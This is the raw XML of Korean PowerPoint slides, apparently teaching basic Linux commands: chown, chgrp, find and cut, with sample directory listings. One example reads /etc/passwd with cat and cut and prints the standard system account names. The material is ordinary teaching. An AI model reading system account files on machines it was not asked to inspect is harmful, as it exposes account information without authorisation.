              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>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10  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>1 15:44 first</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pP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/Theory/T2/14</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sz="4400" kern="0" spc="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>chown</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특정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일의 소유자 변경</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cd /test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findme1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find /test -user </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>adm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>16</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  2 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>28 13:13 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x 26 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>27 20:08 ..</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13:13 findme1</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10  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>1 15:44 first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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>chown</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>adm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> findme1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find /test -user </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>adm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/test/findme1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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>16</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  2 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>28 13:13 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x 26 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>27 20:08 ..</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-r--r--  1 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>adm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  root    0  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>28 13:13 findme1</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10  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>1 15:44 first</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pP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/Theory/T2/15</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sz="4400" kern="0" spc="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>chgrp</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특정 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>파일의 그룹 변경</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cd /test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findme2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find /test -group mem</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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>16</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  2 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>28 13:16 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x 26 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>27 20:08 ..</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-r--r--  1 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>adm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  root    0  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>28 13:13 findme1</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13:16 findme2</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10  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>1 15:44 first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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>chgrp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t> mem findme2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find /test -group mem</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/test/findme2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a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>합계 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>16</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x  2 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>28 13:16 .</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>drwxr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>xr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-x 26 root </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>root</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t> 4096  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>27 20:08 ..</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-r--r--  1 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>adm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>  root    0  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>28 13:13 findme1</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>rw</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>-r--r--  1 root mem     0  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월 </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>28 13:16 findme2</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10  3</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ko-KR" altLang="en-US" sz="1100"/>
                <a:t>월  </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="110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/Theory/T2/16</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t># c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>ut</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t> :</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cat /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/passwd |head</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>root:x:0:0:root:/root:/bin/bash</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>bin:x:1:1:bin:/bin:/</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daemon:x:2:2:daemon:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:/</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adm:x:3:4:adm:/var/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>adm</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:/</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lp:x:4:7:lp:/var/spool/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>lpd</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:/</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sync:x:5:0:sync:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:/bin/sync</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>shutdown:x:6:0:shutdown:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/shutdown</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>halt:x:7:0:halt:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>sbin</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/halt</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>mail:x:8:12:mail:/var/spool/mail:/</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t>news:x:9:13:news:/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>/news:</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cut -f1 -d: /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/passwd |head</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>root</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>bin</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>daemon</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>adm</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1"/>
                <a:t>lp</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="ko-KR" sz="1100"/>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>sync</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>shutdown</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100"/>
                <a:t>halt</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="110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cut -f1 -d: /</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100" err="1">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>etc</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="ko-KR" sz="1100">
                  <a:solidFill>
                    <a:srgbClr val="2E75B6"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>/group |head</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr>
                <a:lnSpc>
                  <a:spcPct val="140000"/>
                </a:lnSpc>
              </a:pPr>
              <a:r>
